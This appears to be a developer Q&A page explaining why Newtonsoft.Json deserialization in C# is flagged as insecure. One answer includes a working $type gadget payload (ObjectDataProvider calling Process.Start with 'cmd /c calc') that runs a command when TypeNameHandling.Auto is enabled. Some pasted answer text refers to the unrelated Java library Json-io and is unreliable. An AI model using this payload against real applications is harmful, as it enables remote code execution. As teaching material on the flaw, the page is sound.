Menu
A static security scanner has flagged my C# code on this line:
var result = JsonConvert.DeserializeObject<dynamic>(response);
response will contain a JSON response from a web API.
The scanner has flagged this as "insecure deserialization".
Can someone help me understand how this can be exploited? Web examples are not really clear on whether the exploit can happen within the DeserializeObject method itself or if only after the deserialization.
845
It was determined that your web application performs JSON deserialization of user-supplied data using Json-io library with the support of Polymorphic Type Handling. Arbitrary JSON deserialization using Json-io is inherently unsafe, and should never be performed on untrusted data.
The most typical example of an insecure deserialization vulnerability is when an attacker loads untrusted code into a serialized object, then forwards it to the web application. The application will deserialize the malicious input if there are no checks, allowing it to access even more of its parts.
Newtonsoft. Json is vulnerable to denial-of-service (DoS) due to a stack overflow that can occur whenever nested objects are being processed. A remote attacker could cause a vulnerable application to crash by causing it to process a maliciously crafted JSON object.
JSON is a format that encodes objects in a string. Serialization means to convert an object into that string, and deserialization is its inverse operation (convert string -> object).
Try to deserialize this json:
{
"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName": "Start",
"MethodParameters": {
"$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"$values": [ "cmd", "/c calc" ]
},
"ObjectInstance": { "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" }
}
with this code
dynamic obj = JsonConvert.DeserializeObject<dynamic>(json, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
It will open the Windows calculator application. The same way any executable or script could be run. The problem persists also if you use object instead of dynamic or the non generic DeserializeObject method. Be aware that if you don't set TypeNameHandling = TypeNameHandling.Auto someone else could set the global settings like this:
JsonConvert.DefaultSettings = () =>
new JsonSerializerSettings{TypeNameHandling = TypeNameHandling.Auto};
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
